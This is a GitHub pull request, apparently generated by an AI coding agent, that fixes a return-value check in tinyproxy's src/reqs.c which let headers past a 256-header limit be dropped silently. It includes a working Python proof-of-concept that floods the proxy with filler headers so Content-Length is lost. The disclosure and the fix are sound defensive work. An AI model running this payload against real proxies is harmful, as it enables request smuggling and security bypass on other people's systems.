Fix Header Dropping Vulnerability in reqs.c by sam-rendell · Pull Request #1 · sam-rendell/tinyproxy · GitHub
Skip to content

Fix Header Dropping Vulnerability in reqs.c#1

Open
sam-rendell wants to merge 1 commit into
masterfrom
fix-header-dropping-vulnerability-8764017303393033696
Open

Fix Header Dropping Vulnerability in reqs.c#1
sam-rendell wants to merge 1 commit into
masterfrom
fix-header-dropping-vulnerability-8764017303393033696

Conversation

@sam-rendell

Copy link
Copy Markdown
Owner

Identify and fix a header dropping vulnerability in src/reqs.c caused by incorrect return value checking of add_header_to_connection. The function pseudomap_append returns 0 when the header limit (256) is reached, but src/reqs.c only checked for < 0. This allowed headers beyond the limit (e.g., Content-Length) to be silently dropped, potentially enabling HTTP Request Smuggling or Security Bypass.

The fix changes the check to <= 0 to correctly handle the failure case.

Vulnerability Details:

  • Severity: High
  • Description: Header Dropping leading to potential Request Smuggling.
  • Vulnerable Path: src/reqs.c:get_all_headers -> add_header_to_connection -> pseudomap_append
  • PoC:
import socket

def attack():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('127.0.0.1', 8888))

    # Request to upstream
    req = "POST http://127.0.0.1:9999/ HTTP/1.1\r\n"
    req += "Host: 127.0.0.1:9999\r\n"
    
    # Send filler headers to reach limit (256)
    for i in range(255):
        req += f"H-{i}: v\r\n"
    
    # Next header is dropped
    req += "Content-Length: 5\r\n"
    req += "\r\n"
    req += "BODY1"
    
    s.sendall(req.encode())
    resp = s.recv(4096)
    print("Response:", resp)
    s.close()

if __name__ == "__main__":
    attack()
  • Mitigation: Change error check to if (... <= 0) in src/reqs.c.

PR created automatically by Jules for task 8764017303393033696 started by @sam-rendell

… check

Co-authored-by: sam-rendell <73448031+sam-rendell@users.noreply.github.com>
@google-labs-jules

Copy link
Copy Markdown

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant